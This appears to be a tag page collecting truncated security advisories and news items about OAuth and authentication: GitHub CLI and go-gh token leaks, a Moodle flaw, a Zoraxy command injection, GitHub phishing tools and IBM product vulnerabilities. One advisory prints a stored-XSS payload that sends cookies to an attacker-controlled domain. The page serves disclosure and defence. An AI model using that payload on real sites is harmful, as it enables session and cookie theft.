#oauth

### Summary A security vulnerability has been identified in the GitHub CLI that could leak authentication tokens when cloning repositories containing `git` submodules hosted outside of GitHub.com and ghe.com. ### Details This vulnerability stems from several `gh` commands used to clone a repository with submodules from a non-GitHub host including `gh repo clone`, `gh repo fork`, `gh pr checkout`. These GitHub CLI commands invoke `git` with instructions to retrieve authentication tokens using the [`credential.helper`](https://git-scm.com/docs/gitcredentials) configuration variable for any host encountered. Prior to `2.63.0`, hosts other than GitHub.com and ghe.com are treated as GitHub Enterprise Server hosts and have tokens sourced from the following environment variables before falling back to host-specific tokens stored within system-specific secured storage: - `GITHUB_ENTERPRISE_TOKEN` - `GH_ENTERPRISE_TOKEN` - `GITHUB_TOKEN` _when `CODESPACES` environment variable is set_ The...

### Summary A security vulnerability has been identified in `go-gh` that could leak authentication tokens intended for GitHub hosts to non-GitHub hosts when within a codespace. ### Details `go-gh` sources authentication tokens from different environment variables depending on the host involved: - `GITHUB_TOKEN`, `GH_TOKEN` for GitHub.com and ghe.com - `GITHUB_ENTERPRISE_TOKEN`, `GH_ENTERPRISE_TOKEN` for GitHub Enterprise Server Prior to `2.11.1`, `auth.TokenForHost` could source a token from the `GITHUB_TOKEN` environment variable for a host other than GitHub.com or ghe.com when [within a codespace](https://github.com/cli/go-gh/blob/71770357e0cb12867d3e3e288854c0aa09d440b7/pkg/auth/auth.go#L73-L77). In `2.11.1`, `auth.TokenForHost` will only source a token from the `GITHUB_TOKEN` environment variable for GitHub.com or ghe.com hosts. ### Impact Successful exploitation could send authentication token to an unintended host. ### Remediation and mitigation 1. Upgrade `go-gh` to `...

Amazon Web Services' identity and access management platform has added new features that help developers implement secure, scalable, and customizable authentication solutions for their applications.

A flaw was found in Moodle. Additional checks were required to ensure users can only delete their OAuth2-linked accounts.

More than 3 billion phone coordinates collected by a US data broker expose the detailed movements of US military and intelligence workers in Germany—and the Pentagon is powerless to stop it.

### Summary A Stored Cross-Site Scripting (XSS) vulnerability in the "Capture Debug Information" page allows authenticated users to inject arbitrary JavaScript through the "hostname" parameter when creating a new device. This vulnerability results in the execution of malicious code when the "Capture Debug Information" page is visited, redirecting the user and sending non-httponly cookies to an attacker-controlled domain. ### Details When creating a new device, an attacker can inject the following XSS payload into the "hostname" parameter: ``` test'" autofocus onfocus="document.location='https://<attacker_domain>/logger.php?c='+document.cookie" ``` (Note: You may need to URL-encode the '+' sign in the payload.) The payload triggers automatically when visiting the "Capture Debug Information" page for the device, redirecting the user's browser to the attacker-controlled domain along with any non-httponly cookies. The vulnerability is due to insufficient sanitization of the "url" vari...

### Summary A command injection vulnerability in the Web SSH feature allows an authenticated attacker to execute arbitrary commands as root on the host. ### Details Zoraxy has a Web SSH terminal feature that allows authenticated users to connect to SSH servers from their browsers. In [`HandleCreateProxySession`](https://github.com/tobychui/zoraxy/blob/9cb315ea6739d1cc201b690322d25166b12dc5db/src/webssh.go#L19) the request to create an SSH session is handled. After checking for the presence of required parameters, ensuring that the target is not the loopback interface and that there is actually an SSH service running on the target, `CreateNewConnection` is called: https://github.com/tobychui/zoraxy/blob/e79a70b7acfa45c2445aff9d60e4e7525c89fec8/src/mod/sshprox/sshprox.go#L165-L178 In line 178, the `gotty` binary is executed running `sshCommand` from the line above. It contains the user-controlled variable `connAddr`, which includes the hostname of the SSH server and - if provided - th...

Marketed on a cybercriminal forum, the $700 tool harvests email addresses from public GitHub profiles, priming cyberattackers for further credential theft, malware delivery, OAuth subversion, supply chain attacks, and other corporate breaches.

SlashNext researchers have discovered a new, sophisticated phishing tool GoIssue targeting GitHub developers. Learn about its capabilities, the…

IBM Security Verify Access versions prior to 10.0.8 suffer from authentication bypass, reuse of private keys, local privilege escalation, weak settings, outdated libraries, missing password, hardcoded secrets, remote code execution, missing authentication, null pointer dereference, and lack of privilege separation vulnerabilities.